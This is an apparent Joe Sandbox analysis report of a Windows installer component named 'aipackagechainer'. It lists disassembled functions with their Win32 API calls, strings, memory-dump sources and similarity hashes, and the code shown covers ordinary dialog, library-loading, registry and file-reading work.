Function 000A86C0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 215windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 000A86F9
SendMessageW.USER32(00000000,00000406,00000000,?), ref: 000A870D

Part of subcall function 000AECD0: GetWindowLongW.USER32(?,000000F0), ref: 000AECF5
Part of subcall function 000AECD0: GetParent.USER32(?), ref: 000AECFF

GetDlgItem.USER32(?,0000040A), ref: 000A873C
SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 000A8777
GetWindowLongW.USER32(?,000000F0), ref: 000A878C
SetWindowLongW.USER32(?,000000F0,00000000), ref: 000A87A4
CreateWindowExW.USER32(00000000,tooltips_class32,00000000,00000000,80000000,80000000,00000000,00000000,?,00000000,00000000), ref: 000A87E1
IsWindow.USER32(00000000), ref: 000A87EB
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 000A8801

Part of subcall function 000CA3DA: GetProcessHeap.KERNEL32(00000008,00000008,?,0009718E), ref: 000CA3DF
Part of subcall function 000CA3DA: HeapAlloc.KERNEL32(00000000), ref: 000CA3E6

SetWindowTextW.USER32(?,?), ref: 000A88B2
GetDlgItem.USER32(?,00000002), ref: 000A88FA
EnableWindow.USER32(00000000,00000000), ref: 000A8903
GetSystemMenu.USER32(?,00000000), ref: 000A890E
ModifyMenuW.USER32(00000000,0000F060,00000001,00000000,00000000), ref: 000A892C
DestroyMenu.USER32(00000000), ref: 000A893E
SetEvent.KERNEL32(?,000000DA), ref: 000A8959

Strings

tooltips_class32, xrefs: 000A87DA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$ItemMenu$HeapMessageSend$AllocCreateDestroyEnableEventModifyParentProcessSystemText
String ID: tooltips_class32
API String ID: 3996269815-1918224756
Opcode ID: 3c43fce19d815cfd6a48e0f22d44ea07ac24a8a7e743311fc8eceefca3596971
Instruction ID: 576ed89c92dacc012eaf703225ec2e85cdcb6f90aeae10685b48625b303b0209
Opcode Fuzzy Hash: 3c43fce19d815cfd6a48e0f22d44ea07ac24a8a7e743311fc8eceefca3596971
Instruction Fuzzy Hash: 2781C170600205EFEB109FA4CD4DF6ABBB5FF05710F148268F915AB6E2DB74A941CB61

Function 0008EDA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 223COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000001F6), ref: 0008EDEE
GetDlgItem.USER32(?,000001F8), ref: 0008EDFB
GetDlgItem.USER32(?,000001F7), ref: 0008EE3D
SetWindowTextW.USER32(00000000,?), ref: 0008EE4C
ShowWindow.USER32(?,00000005), ref: 0008EEB2
GetDlgItem.USER32(?,000001F7), ref: 0008EED4
SetWindowTextW.USER32(00000000,?), ref: 0008EEE3
ShowWindow.USER32(?,00000000), ref: 0008EF48
ShowWindow.USER32(?,00000000), ref: 0008EF4F
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000616), ref: 0008EF98
GetDlgItem.USER32(?,00000000), ref: 0008EFCA
IsWindow.USER32(00000000), ref: 0008EFD4
IsRectEmpty.USER32(?), ref: 0008EFF1
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014,?,00000000,?,?,00000616), ref: 0008F021

Strings

Details >>, xrefs: 0008EEBB
Details <<, xrefs: 0008EE24

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Item$Show$Text$EmptyRect
String ID: Details <<$Details >>
API String ID: 4171068809-3763984547
Opcode ID: 420a8d8c6ca50d616cef89a3a1bfa4a0739965240c03c009d59a6a5af7fd7e45
Instruction ID: d4d2a2bf8311f1ea7ae51f05631473c76fe961ae09b4fb943c4379727a3c0d13
Opcode Fuzzy Hash: 420a8d8c6ca50d616cef89a3a1bfa4a0739965240c03c009d59a6a5af7fd7e45
Instruction Fuzzy Hash: D6818C71D00609AFEB049F78CC49BBEBBB5FF08310F148229F511A7691DB35A950CBA0

Function 000AFD00 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 277windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 000AFD2D
GetWindowLongW.USER32(?,000000F0), ref: 000AFD42
SetWindowLongW.USER32(?,000000F0,00000000), ref: 000AFD59

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

GetWindowLongW.USER32(?,000000EC), ref: 000AFD72
SetWindowLongW.USER32(?,000000EC,00000000), ref: 000AFD86
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 000AFD94
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000AFDA7
IsWindow.USER32(00000000), ref: 000AFDC2
DestroyWindow.USER32(00000000), ref: 000AFDDE
GetClientRect.USER32(?,?), ref: 000AFE36
IsWindow.USER32(00000000), ref: 000AFE5A
CreateWindowExW.USER32(00000000,SCROLLBAR,00000000,5402001C,?,?,?,?,?,0000E801,00000000), ref: 000AFEB2
IsWindow.USER32(00000000), ref: 000AFEBB
GetClientRect.USER32(?,?), ref: 000AFF49

Strings

SCROLLBAR, xrefs: 000AFEAB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$ClientMessageRectSend$AllocateCreateDestroyHeap
String ID: SCROLLBAR
API String ID: 2923869516-324577739
Opcode ID: 9ce14cb366926a4ad536612f0a80ef630e84543ab5e3d0a9fe46676160cecfb4
Instruction ID: d44d97e203b3b30ca0c3d379c21b9ffc11336d453be7db168ba5554b1bb46e97
Opcode Fuzzy Hash: 9ce14cb366926a4ad536612f0a80ef630e84543ab5e3d0a9fe46676160cecfb4
Instruction Fuzzy Hash: 3BB15770508341AFE750DFA8C848B6ABBF5FF8A710F104A2DF595972A0D771E940CB92

Function 000B0440 Relevance: 25.8, APIs: 17, Instructions: 340COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 000B0485
GetWindowRect.USER32(00000000,?), ref: 000B0493
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 000B04C3
InvalidateRect.USER32(00000000,00000000,00000001), ref: 000B07C1
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014), ref: 000B07EA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$InvalidateItemPoints
String ID:
API String ID: 2775623374-0
Opcode ID: cad168ed612379a7f04486bf297e9475a7ff46ef2fbc451b776e11ebcefa11ce
Instruction ID: db09f4ecbbdcd8a04df0bfb93037460f60aef479e72da965ed3b23c1e5858ad7
Opcode Fuzzy Hash: cad168ed612379a7f04486bf297e9475a7ff46ef2fbc451b776e11ebcefa11ce
Instruction Fuzzy Hash: 1ED114756083019FDB58CF2CC989A6BBBE5BF89300F088A5CF989DB255D734E944CB52

Function 000794F0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 257libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,D11C52E5,?,?,00078C43,0000001C,0000001C,workstation,00088BC1,000000B7,OS Version: %u.%u.%u SP%u (%s) [%s],?,?,0000001C,?), ref: 00079558
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0007955E
LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,0010CF70,?,D11C52E5,?,?,00078C43,0000001C,0000001C,workstation,00088BC1,000000B7,OS Version: %u.%u.%u SP%u (%s) [%s],?), ref: 00079592
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00079598

Strings

DllGetActivationFactory, xrefs: 000796EE
combase.dll, xrefs: 00079553, 0007958D
.dll, xrefs: 00079692
RoGetActivationFactory, xrefs: 0007954E
CoIncrementMTAUsage, xrefs: 00079588

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 2574300362-2454113998
Opcode ID: 518a8c441e5dacfa2ec2a3423a137c350b745aaea356d1b6ed80565009b990e5
Instruction ID: 767626e6ca684c9b5c16ff2c325cebbb3edbe17b7e06f1b3eae39df8b8335b9d
Opcode Fuzzy Hash: 518a8c441e5dacfa2ec2a3423a137c350b745aaea356d1b6ed80565009b990e5
Instruction Fuzzy Hash: 0FA1B170D04209EFDB18DFA8C855BEEBBF5EF48310F248219E405A7291EB749A40CB95

Function 00076130 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 253libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,D11C52E5,?,?,?,?,?,?,?,?,?,?,?,?,D11C52E5), ref: 000761AA
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 000761B0
GetErrorInfo.OLEAUT32(00000000,00000000), ref: 000761ED
LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,0010C418,00000000,00000000,00000000), ref: 0007632B
GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00076374

Strings

DllGetActivationFactory, xrefs: 0007636E
combase.dll, xrefs: 000761A5, 00076231
.dll, xrefs: 00076312
RoGetActivationFactory, xrefs: 000761A0
CoIncrementMTAUsage, xrefs: 0007622C

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressLibraryLoadProc$ErrorInfo
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 954284200-2454113998
Opcode ID: 92ad64186b92a42cc4c58a687af1e56de018b8d57b341e5f085f8cdda594b9c3
Instruction ID: 4faa796b92473679e43ceae08ec62727f33366c6fbe5231a5e4d92fb71920739
Opcode Fuzzy Hash: 92ad64186b92a42cc4c58a687af1e56de018b8d57b341e5f085f8cdda594b9c3
Instruction Fuzzy Hash: A4A1AE70D00609EFDB14DFA8C895BEEBBF5EF44300F248129E416B7291DB799A45CB94

Function 0008EA90 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00087860: LoadLibraryW.KERNEL32(ComCtl32.dll,D11C52E5,?,00000000,00000000), ref: 0008789E
Part of subcall function 00087860: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 000878C1
Part of subcall function 00087860: FreeLibrary.KERNEL32(00000000), ref: 0008793F

GetDlgItem.USER32(?,000001F4), ref: 0008EAD1
SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 0008EAE2
GetDC.USER32(00000000), ref: 0008EAEA
GetDeviceCaps.GDI32(00000000), ref: 0008EAF1
MulDiv.KERNEL32(00000009,00000000), ref: 0008EAFA
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Courier New), ref: 0008EB23
GetDlgItem.USER32(?,000001F6), ref: 0008EB34
IsWindow.USER32(00000000), ref: 0008EB3D
SendMessageW.USER32(00000000,00000030,?,00000000), ref: 0008EB54
GetDlgItem.USER32(?,000001F8), ref: 0008EB5E
GetWindowRect.USER32(?,?), ref: 0008EB6F
GetWindowRect.USER32(?,?), ref: 0008EB82
GetWindowRect.USER32(00000000,?), ref: 0008EB92

Strings

Courier New, xrefs: 0008EB00

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$ItemRect$LibraryMessageSend$AddressCapsCreateDeviceFontFreeLoadProc
String ID: Courier New
API String ID: 1731048342-2572734833
Opcode ID: 0721793f9f0549b5011435b1488a28654b6267fd026edffa31083c3b84dc0f23
Instruction ID: 0481e71649133c81a11fc8141e93d54d3d5ce5326f4995c4827457c5a5fb670a
Opcode Fuzzy Hash: 0721793f9f0549b5011435b1488a28654b6267fd026edffa31083c3b84dc0f23
Instruction Fuzzy Hash: 5841A471BC43097BFB14AF21CC46FBE7799AF48B04F010529BB497A1D2DEB4A9408B55

Function 00082BA0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 389libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00082C32
GetLastError.KERNEL32 ref: 00082C60

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00082C76
FreeLibrary.KERNEL32(00000000), ref: 00082C8F
GetLastError.KERNEL32 ref: 00082C9C
GetLastError.KERNEL32 ref: 00082E8A
GetLastError.KERNEL32 ref: 00082EEF

Strings

Advapi32.dll, xrefs: 00082C2D
ConvertStringSidToSidW, xrefs: 00082C70

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
String ID: Advapi32.dll$ConvertStringSidToSidW
API String ID: 3460774402-1129428314
Opcode ID: c0ecafac4bd76157aa9e902fa549f8c0d4aa3a5e5fe02026f2aa7681621c3082
Instruction ID: daee22d2bf5dd54a69ef05c98502a28f6cf027a1fc933df4e84d9c60ef1cc2d8
Opcode Fuzzy Hash: c0ecafac4bd76157aa9e902fa549f8c0d4aa3a5e5fe02026f2aa7681621c3082
Instruction Fuzzy Hash: 92F1A9B1C01209EBEB10EF90D945BEEBBB4FF48314F204229E955B7281D774AA45CFA1

Function 000ABCA0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 294fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,D11C52E5), ref: 000ABCDF
GetLastError.KERNEL32 ref: 000ABD00

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

GetFileSize.KERNEL32(00000000,00000000), ref: 000ABD10
GetLastError.KERNEL32 ref: 000ABD1D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,000F9F75,000000FF), ref: 000ABFA6

Strings

US-ASCII, xrefs: 000ABE98
utf-8, xrefs: 000ABD95
ISO-8859-1, xrefs: 000ABE7B
utf-16, xrefs: 000ABDB2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorFileLast$AllocateCloseCreateHandleHeapSize
String ID: ISO-8859-1$US-ASCII$utf-16$utf-8
API String ID: 4082270022-3020978663
Opcode ID: 2690e639a64cea2cfb24219d76c7c5065d39797e196c8c85191a33e979b9f4b5
Instruction ID: 714670c1bf9cf620e7544ccde0c12153f2541eacf2c51692288c052a9375d3cb
Opcode Fuzzy Hash: 2690e639a64cea2cfb24219d76c7c5065d39797e196c8c85191a33e979b9f4b5
Instruction Fuzzy Hash: F991E571A00346EFDB10DFA4CC85BEEBBE5AF15310F144129F915AB2D2EB749944CBA1

Function 00086410 Relevance: 21.5, APIs: 8, Strings: 4, Instructions: 466registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\JavaSoft\Java Development Kit\,00000000,?,?,D11C52E5,?,?), ref: 00086473
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?), ref: 00086609
RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?,?,?), ref: 00086665
RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?), ref: 000866B5
RegCloseKey.ADVAPI32(?), ref: 000866F5

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

RegCloseKey.ADVAPI32(?,?,?), ref: 00086A0E

Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203

RegCloseKey.ADVAPI32(?,?,?,?), ref: 00086A4B
RegCloseKey.ADVAPI32(?), ref: 00086AD6

Strings

JavaHome, xrefs: 0008665F, 000866AA
Software\JavaSoft\Java Runtime Environment\, xrefs: 00086456
hu, xrefs: 000866E0, 000869F9
Software\JavaSoft\Java Development Kit\, xrefs: 00086465, 0008646D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Close$OpenQueryValue$FindHeapProcessResource
String ID: hu$JavaHome$Software\JavaSoft\Java Development Kit\$Software\JavaSoft\Java Runtime Environment\
API String ID: 1322027183-2298091104
Opcode ID: 9a6d0e8e0258676e179c1dc7d5e771a4ad4a60815ed7f0f24bc8738bfbf1e265
Instruction ID: 404e5ef24756333f2bf7862153e2d313c3e47420eaa446dc294d642e0d5809f6
Opcode Fuzzy Hash: 9a6d0e8e0258676e179c1dc7d5e771a4ad4a60815ed7f0f24bc8738bfbf1e265
Instruction Fuzzy Hash: EE12AD709012699BDB60EB68CC89BDEB7F4FF44304F1142D8E849A7291EB75AE84CF51

Function 0007E220 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,D11C52E5), ref: 0007E2C8
GetLastError.KERNEL32 ref: 0007E2D2
EnterCriticalSection.KERNEL32(?), ref: 0007E347
LeaveCriticalSection.KERNEL32(?,7742E820,?), ref: 0007E374
GetModuleFileNameW.KERNEL32(00060000,?,00000104), ref: 0007E3C9
GetModuleHandleW.KERNEL32(00000000), ref: 0007E431
LeaveCriticalSection.KERNEL32(?,Module,?), ref: 0007E530
EnterCriticalSection.KERNEL32(?), ref: 0007E551
LeaveCriticalSection.KERNEL32(?,Module_Raw,?), ref: 0007E585

Strings

Module, xrefs: 0007E517
Module_Raw, xrefs: 0007E56C
REGISTRY, xrefs: 0007E606

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$Leave$EnterModule$ErrorFileHandleInitializeLastName
String ID: Module$Module_Raw$REGISTRY
API String ID: 1851870515-549000027
Opcode ID: d11de82b3c1b48cb104a9cbce232adcc5c0759df591d46c81aee7aed022da6c4
Instruction ID: 0576fb22bed1496b6198d5da9507a70e6d35a84c5f3e4bec6c152d172ab114bb
Opcode Fuzzy Hash: d11de82b3c1b48cb104a9cbce232adcc5c0759df591d46c81aee7aed022da6c4
Instruction Fuzzy Hash: 89B1BC71E01398DBDB20CB64CC44BDEB7B4AB49300F1085D9E90DA7691EB799F84CB96

Function 0008E140 Relevance: 21.2, APIs: 14, Instructions: 151windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0008E17F
GetWindowLongW.USER32(?,000000F0), ref: 0008E190
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0008E1A2
GetWindowLongW.USER32(?,000000EC), ref: 0008E1B5
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0008E1C4
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0008E1D8
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0008E1E7
GetClientRect.USER32(?,?), ref: 0008E1FE
GetClientRect.USER32(?,?), ref: 0008E222
GetWindowRect.USER32(?,?), ref: 0008E226
GetDlgItem.USER32(?,?), ref: 0008E262
IsWindow.USER32(00000000), ref: 0008E26D
GetWindowRect.USER32(?,?), ref: 0008E288
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0008E299

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$Rect$ClientMessageSend$ItemPoints
String ID:
API String ID: 3417004906-0
Opcode ID: 54238805d9ecfbdccf1fc8efb8caa7e55ee334b9108d20ec3c5bf59649a03203
Instruction ID: 0406b61619927f681ce1c48421c4c9d7f02d86314920cdd375f08add2b6ec7fd
Opcode Fuzzy Hash: 54238805d9ecfbdccf1fc8efb8caa7e55ee334b9108d20ec3c5bf59649a03203
Instruction Fuzzy Hash: 03419D315043429FE720EF68DC48B2BB7E8BF98710F244A1DF5D5935A1DB30A984CB62

Function 000CC72D Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00128FDC,00000FA0,?,?,000CC70B), ref: 000CC739
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,000CC70B), ref: 000CC744
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,000CC70B), ref: 000CC755
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000CC767
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000CC775
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000CC70B), ref: 000CC798
DeleteCriticalSection.KERNEL32(00128FDC,00000007,?,?,000CC70B), ref: 000CC7B4
CloseHandle.KERNEL32(00000000,?,?,000CC70B), ref: 000CC7C4

Strings

WakeAllConditionVariable, xrefs: 000CC76D
SleepConditionVariableCS, xrefs: 000CC761
kernel32.dll, xrefs: 000CC750
api-ms-win-core-synch-l1-2-0.dll, xrefs: 000CC73F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 80e2c1cb5c53ab743c7c6943b8a7539a30dd2dd3fa093a86d0f9aeb6c96fc346
Instruction ID: 240bfced5f4fcd0d5ca02e38ed2c5791c847069e87bae5ab17fcbfabb78b1105
Opcode Fuzzy Hash: 80e2c1cb5c53ab743c7c6943b8a7539a30dd2dd3fa093a86d0f9aeb6c96fc346
Instruction Fuzzy Hash: 9701B531645616ABF7201B70ED4DF3A3799EB44B117140124FE05D2AA0DFB8C880EA61

Function 00098930 Relevance: 19.7, APIs: 13, Instructions: 171COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00098977
GetParent.USER32(00000000), ref: 0009898A
GetWindow.USER32(00000000,00000004), ref: 0009899A
GetWindowRect.USER32(?,?), ref: 000989AB
GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
